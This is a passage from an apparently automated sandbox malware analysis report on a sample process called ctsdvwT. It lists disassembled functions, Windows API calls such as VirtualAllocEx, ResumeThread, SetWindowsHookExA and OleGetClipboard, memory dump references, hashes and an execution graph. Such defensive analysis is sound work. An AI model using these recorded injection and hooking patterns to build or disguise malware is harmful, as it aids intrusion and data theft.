                                • Opcode Fuzzy Hash: 3107352869a1b2cde35ca0e42d321e5b1bd4e6cb16ccb1659a8445dc59041a25
                                • Instruction Fuzzy Hash: C61112B68003498FDB14CF9AC444BEEFBF8EB48314F10842EE959A7644C3B5A945CFA0
                                Function 06096368 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 060963D6
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1577221808.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_6090000_ctsdvwT.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: a41dd32174d7cacf49475ef6720ee59ac14bfdb9895ea3eef138c15404b8f860
                                • Instruction ID: 31374f77b02bab07e5f2866141e648bc691d0f6f747d6289f2482d78620eb495
                                • Opcode Fuzzy Hash: a41dd32174d7cacf49475ef6720ee59ac14bfdb9895ea3eef138c15404b8f860
                                • Instruction Fuzzy Hash: 6A1126718003499FDF10DFAAC844BEEBBF5EB48310F148429E959A7250CB76A540CBA0
                                Function 0131B2A3 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0131B101,00000800,00000000,00000000), ref: 0131B312
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1567055902.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_1310000_ctsdvwT.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID:
                                • API String ID: 1029625771-0
                                • Opcode ID: bb626f741390a1f8dd10a189fbbad98fb2946e2d80c28104d2d1d39dfecc8de2
                                • Instruction ID: 59eb5278e56cd5fba53454e49c0968ddaed36f13649b80c013b695e2fd782ec6
                                • Opcode Fuzzy Hash: bb626f741390a1f8dd10a189fbbad98fb2946e2d80c28104d2d1d39dfecc8de2
                                • Instruction Fuzzy Hash: CD1112B68003498FDB14CFAAC444BDEFBF4EB88310F14842AE959A7201C375A545CFA0
                                Function 06095DA0 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1577221808.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_6090000_ctsdvwT.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 676776151a2b9af3d2510a678092b07269c63960dd246e6edcd0c3d1a6d0e35f
                                • Instruction ID: c1ee6a62f7bd856d029406eed05955e33b4cdd9fbcbce44be3ff920bbde9c81c
                                • Opcode Fuzzy Hash: 676776151a2b9af3d2510a678092b07269c63960dd246e6edcd0c3d1a6d0e35f
                                • Instruction Fuzzy Hash: 4B1176B58003488FDB24DFAAC8447EEFBF5AB88320F24842AD429A7240CA755840CBA4
                                Function 06095DA8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1577221808.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_6090000_ctsdvwT.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 16215da58e07f00078a5e20136d4f28fca9e2b1c894c2dc626f3bb093a2c9650
                                • Instruction ID: e7e0ecabf433bdc804da0562cfbab1883fc317e23875627feb963b7201e1e6f6
                                • Opcode Fuzzy Hash: 16215da58e07f00078a5e20136d4f28fca9e2b1c894c2dc626f3bb093a2c9650
                                • Instruction Fuzzy Hash: C7113AB1D003488FDB14DFAAC8457DEFBF5EB88314F148429D559A7240CB75A944CBA4
                                Function 0131B01B Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0131B086
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1567055902.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_1310000_ctsdvwT.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: bb8f23556328169618d3c03c72aee52583aa1d1139cb76e2d36afa19ef1859de
                                • Instruction ID: f3199aa8a43f88a86c89d6dcdedbc3f6db903126f1fd65c3b8f7ffc6cfda44b4
                                • Opcode Fuzzy Hash: bb8f23556328169618d3c03c72aee52583aa1d1139cb76e2d36afa19ef1859de
                                • Instruction Fuzzy Hash: 48111FB5C002498EDB24CFAAD444ADEFBF0AF88314F14802AD869A7205C375A549CFA0
                                Function 0131B020 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0131B086
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1567055902.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_1310000_ctsdvwT.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: df2661b195bb20b1618a9da2963cd38a823b86167f4c291a1b4b818adffab786
                                • Instruction ID: e0651544d9d6432946c40efa636e22899ebbf00f90cbc379989aeff1bc93efad
                                • Opcode Fuzzy Hash: df2661b195bb20b1618a9da2963cd38a823b86167f4c291a1b4b818adffab786
                                • Instruction Fuzzy Hash: 021110B5C007498FDB24CF9AC444BDEFBF4AB88314F10842AD869B7214C375A649CFA1
                                Function 06099078 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                Download Yara Rule
                                APIs
                                • PostMessageW.USER32(?,?,?,?), ref: 060990DD
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1577221808.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_6090000_ctsdvwT.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID:
                                • API String ID: 410705778-0
                                • Opcode ID: 2b0ac9e7ee7273724a3c3bd99e9c737c32e75669aeb66ec23961f5197755ced9
                                • Instruction ID: 9212c2f8a3a7210c98517810af437cdc57452b760e4fe9753a21d36c31acb67f
                                • Opcode Fuzzy Hash: 2b0ac9e7ee7273724a3c3bd99e9c737c32e75669aeb66ec23961f5197755ced9
                                • Instruction Fuzzy Hash: 9911F5B58007499FDB60DF99C884BDEBFF4EB48320F248519E568A7241C375A544CFA1
                                Function 06099080 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                Download Yara Rule
                                APIs
                                • PostMessageW.USER32(?,?,?,?), ref: 060990DD
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1577221808.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_6090000_ctsdvwT.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID:
                                • API String ID: 410705778-0
                                • Opcode ID: 50e0dcaa2f03a0b2a7d470991efd1b2c9b986bc913c78023d5d39e20350de444
                                • Instruction ID: cb18f0541a4cd85655a62333cdf6632faa9f7011be96ea0eb0652fe07b46bdfd
                                • Opcode Fuzzy Hash: 50e0dcaa2f03a0b2a7d470991efd1b2c9b986bc913c78023d5d39e20350de444
                                • Instruction Fuzzy Hash: 4811D3B58003499FDB50DF9AD885BDEFBF8FB48320F148419E958A7241C775A944CFA1
                                Function 012BD4C4 Relevance: .1, Instructions: 75COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1566444039.00000000012BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_12bd000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8e975be0ea0f8db74b640e0222d86ff72ffbac841d33302cd856305f8f39cae8
                                • Instruction ID: c4b3a314e9e1fd8551228e596c6ad40133816b9a49f5c77114613c4922460096
                                • Opcode Fuzzy Hash: 8e975be0ea0f8db74b640e0222d86ff72ffbac841d33302cd856305f8f39cae8
                                • Instruction Fuzzy Hash: 85214571524208DFDB05DF94E9C0BA6BF65FB8835CF20C169E9090B257C336E456CBA2
                                Function 012CD01C Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1566594402.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_12cd000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8b30ad386d2b9cb686d3b83433d5e5d3f666af584b620539bd374e4ff54bb50d
                                • Instruction ID: 7ba62afc1a43a126b8ef464afcef691f2f7e14b6cbfac9d4aab34b22af02ff69
                                • Opcode Fuzzy Hash: 8b30ad386d2b9cb686d3b83433d5e5d3f666af584b620539bd374e4ff54bb50d
                                • Instruction Fuzzy Hash: A4210071614208DFDB15DFA8D880B26BBA1EB88714F20C67DDA4A0B242C376D447CAA2
                                Function 012CD1D4 Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1566594402.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_12cd000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 94ad6e37a929f8247aa7134a6bdab224918e81bc53c6126a81e229e2036a81b9
                                • Instruction ID: 5cbb3f31474b67de5033ded8757b5c645414e42351924b6d8f73062c9715f00d
                                • Opcode Fuzzy Hash: 94ad6e37a929f8247aa7134a6bdab224918e81bc53c6126a81e229e2036a81b9
                                • Instruction Fuzzy Hash: C5213771554308DFDB05DF94D9C0B26BB62FB84724F20C67DDA494B253C376D446CAA2
                                Function 012CD006 Relevance: .1, Instructions: 63COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1566594402.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_12cd000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 438ec98cdd109678c35ec0c65a7348888da01868ada7756fae573c1fde500210
                                • Instruction ID: 062b701e37ba180631f0edcd29ae923d39bf13f9346eb8bab8d0e36c2e7c8e6a
                                • Opcode Fuzzy Hash: 438ec98cdd109678c35ec0c65a7348888da01868ada7756fae573c1fde500210
                                • Instruction Fuzzy Hash: 9E2195755083849FCB03CF58D994711BF71EB46314F24C5EAD9498F2A7C33A984ACBA2
                                Function 012BD4BF Relevance: .1, Instructions: 56COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1566444039.00000000012BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_12bd000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                • Instruction ID: 2d6099cff65366957042984b67906f1d4963bc20bb7ac40d55c8d9eb3de082dd
                                • Opcode Fuzzy Hash: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                • Instruction Fuzzy Hash: FE112676404284CFCB12CF54D5C4B96BF71FB84318F24C6A9D9490B657C33AD45ACBA1
                                Function 012CD1CF Relevance: .1, Instructions: 53COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1566594402.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_12cd000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 04b342587f02f4df216fd9fa4589941a60fabf0b5787ec5e4e812599987ae7f8
                                • Instruction ID: 576fa2bedc423829627bcabec8428628db7f0939e0079a4d54b9f300f628c0fc
                                • Opcode Fuzzy Hash: 04b342587f02f4df216fd9fa4589941a60fabf0b5787ec5e4e812599987ae7f8
                                • Instruction Fuzzy Hash: 6811EE75544244CFDB02CF54C5C0B15BB62FB84324F24C6ADDA494B253C33AD40ACB92

                                Execution Graph

                                Execution Coverage:10.8%
                                Dynamic/Decrypted Code Coverage:93.2%
                                Signature Coverage:0%
                                Total number of Nodes:191
                                Total number of Limit Nodes:22
                                execution_graph 23631 60e78ca 23632 60e7918 GetModuleHandleW 23631->23632 23633 60e7912 23631->23633 23634 60e7945 23632->23634 23633->23632 23635 60efe08 23636 60efe4c SetWindowsHookExA 23635->23636 23638 60efe92 23636->23638 23717 60e8978 23718 60e89e0 CreateWindowExW 23717->23718 23720 60e8a9c 23718->23720 23720->23720 23721 60ec6d8 DuplicateHandle 23722 60ec76e 23721->23722 23723 ead01c 23724 ead034 23723->23724 23725 ead08e 23724->23725 23731 60e8b22 23724->23731 23737 60e6c14 23724->23737 23741 60e6c24 23724->23741 23749 60e8b30 23724->23749 23755 60ed2b3 23724->23755 23732 60e8b56 23731->23732 23733 60e6c14 GetModuleHandleW 23732->23733 23734 60e8b62 23733->23734 23735 60e6c24 2 API calls 23734->23735 23736 60e8b77 23735->23736 23736->23725 23738 60e6c1f 23737->23738 23763 60e6c4c 23738->23763 23740 60e8c67 23740->23725 23742 60e6c2f 23741->23742 23743 60ed341 23742->23743 23745 60ed331 23742->23745 23779 60ec28c 23743->23779 23767 60ed458 23745->23767 23773 60ed468 23745->23773 23746 60ed33f 23750 60e8b56 23749->23750 23751 60e6c14 GetModuleHandleW 23750->23751 23752 60e8b62 23751->23752 23753 60e6c24 2 API calls 23752->23753 23754 60e8b77 23753->23754 23754->23725 23756 60ed2ba 23755->23756 23757 60ed341 23756->23757 23759 60ed331 23756->23759 23758 60ec28c 2 API calls 23757->23758 23760 60ed33f 23758->23760 23761 60ed458 2 API calls 23759->23761 23762 60ed468 2 API calls 23759->23762 23760->23760 23761->23760 23762->23760 23764 60e6c57 23763->23764 23765 60e5e3c GetModuleHandleW 23764->23765 23766 60e8d37 23764->23766 23765->23766 23769 60ed476 23767->23769 23768 60ec28c 2 API calls 23768->23769 23769->23768 23770 60ed552 23769->23770 23786 60ed939 23769->23786 23791 60ed948 23769->23791 23770->23746 23775 60ed476 23773->23775 23774 60ec28c 2 API calls 23774->23775 23775->23774 23776 60ed552 23775->23776 23777 60ed948 OleGetClipboard 23775->23777 23778 60ed939 OleGetClipboard 23775->23778 23776->23746 23777->23775 23778->23775 23780 60ec297 23779->23780 23781 60ed5aa 23780->23781 23782 60ed654 23780->23782 23784 60ed602 CallWindowProcW 23781->23784 23785 60ed5b1 23781->23785 23783 60e6c24 OleGetClipboard 23782->23783 23783->23785 23784->23785 23785->23746 23787 60ed967 23786->23787 23788 60ed9ee 23787->23788 23796 60edebf 23787->23796 23815 60edf00 23787->23815 23788->23769 23792 60ed967 23791->23792 23793 60ed9ee 23792->23793 23794 60edebf OleGetClipboard 23792->23794 23795 60edf00 OleGetClipboard 23792->23795 23793->23769 23794->23792 23795->23792 23797 60eded5 23796->23797 23798 60edf37 23797->23798 23802 60ededa 23797->23802 23799 60edf75 23798->23799 23804 60edfb9 23798->23804 23807 60edebf OleGetClipboard 23799->23807 23808 60edf38 OleGetClipboard 23799->23808 23809 60edf48 OleGetClipboard 23799->23809 23800 60edf1c 23800->23787 23801 60edf7b 23801->23787 23802->23800 23812 60edebf OleGetClipboard 23802->23812 23822 60edf38 23802->23822 23834 60edf48 23802->23834 23803 60edf31 23803->23787 23806 60ee039 23804->23806 23846 60ee210 23804->23846 23850 60ee200 23804->23850 23805 60ee057 23805->23787 23806->23787 23807->23801 23808->23801 23809->23801 23812->23803 23816 60edf08 23815->23816 23817 60edf1c 23816->23817 23819 60edebf OleGetClipboard 23816->23819 23820 60edf38 OleGetClipboard 23816->23820 23821 60edf48 OleGetClipboard 23816->23821 23817->23787 23818 60edf31 23818->23787 23819->23818 23820->23818 23821->23818 23823 60edf48 23822->23823 23824 60edf75 23823->23824 23826 60edfb9 23823->23826 23829 60edebf OleGetClipboard 23824->23829 23830 60edf38 OleGetClipboard 23824->23830 23831 60edf48 OleGetClipboard 23824->23831 23825 60edf7b 23825->23803 23828 60ee039 23826->23828 23832 60ee200 OleGetClipboard 23826->23832 23833 60ee210 OleGetClipboard 23826->23833 23827 60ee057 23827->23803 23828->23803 23829->23825 23830->23825 23831->23825 23832->23827 23833->23827 23835 60edf5a 23834->23835 23836 60edf75 23835->23836 23838 60edfb9 23835->23838 23841 60edebf OleGetClipboard 23836->23841 23842 60edf38 OleGetClipboard 23836->23842 23843 60edf48 OleGetClipboard 23836->23843 23837 60edf7b 23837->23803 23840 60ee039 23838->23840 23844 60ee200 OleGetClipboard 23838->23844 23845 60ee210 OleGetClipboard 23838->23845 23839 60ee057 23839->23803 23840->23803 23841->23837 23842->23837 23843->23837 23844->23839 23845->23839 23847 60ee225 23846->23847 23849 60ee24b 23847->23849 23854 60edca8 23847->23854 23849->23805 23852 60ee210 23850->23852 23851 60edca8 OleGetClipboard 23851->23852 23852->23851 23853 60ee24b 23852->23853 23853->23805 23855 60ee2b8 OleGetClipboard 23854->23855 23857 60ee352 23855->23857 23639 1200848 23640 120084e 23639->23640 23641 120091b 23640->23641 23643 1201380 23640->23643 23645 1201396 23643->23645 23644 1201498 23644->23640 23645->23644 23648 60e58cb 23645->23648 23654 60e58e0 23645->23654 23649 60e58dc 23648->23649 23652 60e59a3 23649->23652 23660 60e03a4 23649->23660 23651 60e5969 23665 60e03c4 23651->23665 23652->23645 23655 60e58e1 23654->23655 23656 60e03a4 GetModuleHandleW 23655->23656 23658 60e59a3 23655->23658 23657 60e5969 23656->23657 23659 60e03c4 KiUserCallbackDispatcher 23657->23659 23658->23645 23659->23658 23661 60e03af 23660->23661 23669 60e6e91 23661->23669 23675 60e6ea0 23661->23675 23662 60e5f4a 23662->23651 23666 60e03cf 23665->23666 23668 60ed893 23666->23668 23706 60ec2e4 23666->23706 23668->23652 23670 60e6ea0 23669->23670 23681 60e7411 23670->23681 23671 60e6f4e 23672 60e5e3c GetModuleHandleW 23671->23672 23673 60e6f7a 23671->23673 23672->23673 23676 60e6ecb 23675->23676 23680 60e7411 GetModuleHandleW 23676->23680 23677 60e6f4e 23678 60e5e3c GetModuleHandleW 23677->23678 23679 60e6f7a 23677->23679 23678->23679 23680->23677 23682 60e744d 23681->23682 23683 60e74ce 23682->23683 23686 60e75ef 23682->23686 23694 60e7683 23682->23694 23687 60e75fa 23686->23687 23702 60e5e3c 23687->23702 23689 60e771a 23690 60e5e3c GetModuleHandleW 23689->23690 23691 60e7794 23689->23691 23692 60e7768 23690->23692 23691->23683 23692->23691 23693 60e5e3c GetModuleHandleW 23692->23693 23693->23691 23695 60e76af 23694->23695 23696 60e5e3c GetModuleHandleW 23695->23696 23697 60e771a 23696->23697 23698 60e5e3c GetModuleHandleW 23697->23698 23701 60e7794 23697->23701 23699 60e7768 23698->23699 23700 60e5e3c GetModuleHandleW 23699->23700 23699->23701 23700->23701 23701->23683 23703 60e78d0 GetModuleHandleW 23702->23703 23705 60e7945 23703->23705 23705->23689 23707 60ed8a8 KiUserCallbackDispatcher 23706->23707 23709 60ed916 23707->23709 23709->23666 23710 60ee120 23711 60ee12b 23710->23711 23712 60ee13b 23711->23712 23714 60edb90 23711->23714 23715 60ee170 OleInitialize 23714->23715 23716 60ee1d4 23715->23716 23716->23712

                                Executed Functions

                                Function 01209638 Relevance: 2.8, Instructions: 2818COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9af8bd40bcac92d633056dc2cffdfae7e2fd8cd72489e4d5c3c2d77f6b280e10
                                • Instruction ID: f1066dc94b44fa14ae035f98be54587e231be7d460cd49ac9f10c4796c29e973
                                • Opcode Fuzzy Hash: 9af8bd40bcac92d633056dc2cffdfae7e2fd8cd72489e4d5c3c2d77f6b280e10
                                • Instruction Fuzzy Hash: 5E530831D10B1A8ADB51EF68C8805A9F7B1FF99300F51C79AE4587B161FB70AAD4CB81
                                Function 0120C988 Relevance: 2.2, Instructions: 2222COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 898df2d05d350b83226e42fd1d6ef06a9ce7e2ad16600dace769a9c6ca96d2ce
                                • Instruction ID: 437f33d6d9619c9fe467b83469bd23e9209e670b082231c5cb5098a275cf26e6
                                • Opcode Fuzzy Hash: 898df2d05d350b83226e42fd1d6ef06a9ce7e2ad16600dace769a9c6ca96d2ce
                                • Instruction Fuzzy Hash: 88333E31D10B1A8EDB11EF68C8806ADF7B1FF99300F15C79AE459A7251EB70AAC5CB41
                                Function 01203E98 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID: \Vek
                                • API String ID: 0-172235318
                                • Opcode ID: b413f0112d57c41258a4ed3ee91a54d4f8455964473ec9d6fbd16d4c3ce12ff3
                                • Instruction ID: 3fadb6e5cbf4d128466aceaa38f44945e0608d570d148b46ae84d91c0f4fb902
                                • Opcode Fuzzy Hash: b413f0112d57c41258a4ed3ee91a54d4f8455964473ec9d6fbd16d4c3ce12ff3
                                • Instruction Fuzzy Hash: 9191AB70E1024ACFDF15DFA9C88479EBBF2BF88304F14C229E614A7295DB748885CB80
                                Function 01208E5C Relevance: .4, Instructions: 413COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5c41440b1f24cba215a4a16c82aa6117e4fb8ca3792e2476c334bc33c7cb2ad1
                                • Instruction ID: d17168b0dee5408501b9c17c393476c9b1bd5538e54cbaa3da38667f898f4217
                                • Opcode Fuzzy Hash: 5c41440b1f24cba215a4a16c82aa6117e4fb8ca3792e2476c334bc33c7cb2ad1
                                • Instruction Fuzzy Hash: DAF1A434B102059FDF15DBA8D494AAEBBB2FF88314F148529E516E7392DB35DC41CB50
                                Function 01204AB0 Relevance: .3, Instructions: 266COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4b8f80a80500ed6933498d2160bd920305c84652409b12928fe1628f35e0c6a5
                                • Instruction ID: e36944723a2ce3f339c0bdbd441dc003e271fec6ed7f3999a0a629a141a9c9e0
                                • Opcode Fuzzy Hash: 4b8f80a80500ed6933498d2160bd920305c84652409b12928fe1628f35e0c6a5
                                • Instruction Fuzzy Hash: D7B18070E1024ACFDB11DFA9D88179DBBF2BF88714F14C629DA14E7295EB749881CB81
                                Function 01204828 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 473 1204828-12048b4 476 12048b6-12048c1 473->476 477 12048fe-1204900 473->477 476->477 479 12048c3-12048cf 476->479 478 1204902-120491a 477->478 485 1204964-1204966 478->485 486 120491c-1204927 478->486 480 12048d1-12048db 479->480 481 12048f2-12048fc 479->481 483 12048dd 480->483 484 12048df-12048ee 480->484 481->478 483->484 484->484 487 12048f0 484->487 489 1204968-12049ad 485->489 486->485 488 1204929-1204935 486->488 487->481 490 1204937-1204941 488->490 491 1204958-1204962 488->491 497 12049b3-12049c1 489->497 492 1204943 490->492 493 1204945-1204954 490->493 491->489 492->493 493->493 495 1204956 493->495 495->491 498 12049c3-12049c9 497->498 499 12049ca-1204a27 497->499 498->499 506 1204a37-1204a3b 499->506 507 1204a29-1204a2d 499->507 509 1204a4b-1204a4f 506->509 510 1204a3d-1204a41 506->510 507->506 508 1204a2f-1204a32 call 1200ab8 507->508 508->506 513 1204a51-1204a55 509->513 514 1204a5f-1204a63 509->514 510->509 512 1204a43-1204a46 call 1200ab8 510->512 512->509 513->514 516 1204a57 513->516 517 1204a73 514->517 518 1204a65-1204a69 514->518 516->514 520 1204a74 517->520 518->517 519 1204a6b 518->519 519->517 520->520
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID: \Vek$\Vek
                                • API String ID: 0-1171950776
                                • Opcode ID: 0425a583a6f2bee58be9c10ca65f58af9e360a4922547b2cb03db92b0502173b
                                • Instruction ID: 8430f8f0dbb9982a9926c7109d2cbe4540472b81312501acde22c86f6740a33f
                                • Opcode Fuzzy Hash: 0425a583a6f2bee58be9c10ca65f58af9e360a4922547b2cb03db92b0502173b
                                • Instruction Fuzzy Hash: C3717C70E10389CFDF11DFA9C88079EBBF2AF88714F14C229E614A7295DB749881CB95
                                Function 0120481C Relevance: 2.7, Strings: 2, Instructions: 177COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 521 120481c-12048b4 524 12048b6-12048c1 521->524 525 12048fe-1204900 521->525 524->525 527 12048c3-12048cf 524->527 526 1204902-120491a 525->526 533 1204964-1204966 526->533 534 120491c-1204927 526->534 528 12048d1-12048db 527->528 529 12048f2-12048fc 527->529 531 12048dd 528->531 532 12048df-12048ee 528->532 529->526 531->532 532->532 535 12048f0 532->535 537 1204968-120497a 533->537 534->533 536 1204929-1204935 534->536 535->529 538 1204937-1204941 536->538 539 1204958-1204962 536->539 544 1204981-12049ad 537->544 540 1204943 538->540 541 1204945-1204954 538->541 539->537 540->541 541->541 543 1204956 541->543 543->539 545 12049b3-12049c1 544->545 546 12049c3-12049c9 545->546 547 12049ca-1204a27 545->547 546->547 554 1204a37-1204a3b 547->554 555 1204a29-1204a2d 547->555 557 1204a4b-1204a4f 554->557 558 1204a3d-1204a41 554->558 555->554 556 1204a2f-1204a32 call 1200ab8 555->556 556->554 561 1204a51-1204a55 557->561 562 1204a5f-1204a63 557->562 558->557 560 1204a43-1204a46 call 1200ab8 558->560 560->557 561->562 564 1204a57 561->564 565 1204a73 562->565 566 1204a65-1204a69 562->566 564->562 568 1204a74 565->568 566->565 567 1204a6b 566->567 567->565 568->568
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID: \Vek$\Vek
                                • API String ID: 0-1171950776
                                • Opcode ID: ee715e3065611ae2555e11e845bfb6d8676b061ec6f2f2c21d9cbe3437296f57
                                • Instruction ID: a76e1d6b00ab6e1ad570bef275ce71d836192bc04b570feaa6b065197f375de8
                                • Opcode Fuzzy Hash: ee715e3065611ae2555e11e845bfb6d8676b061ec6f2f2c21d9cbe3437296f57
                                • Instruction Fuzzy Hash: 35717AB0E10289CFDF11DFA9C88179EBBF1AF88714F14C229E614A7295DB749881CB95
                                Function 060E896E Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
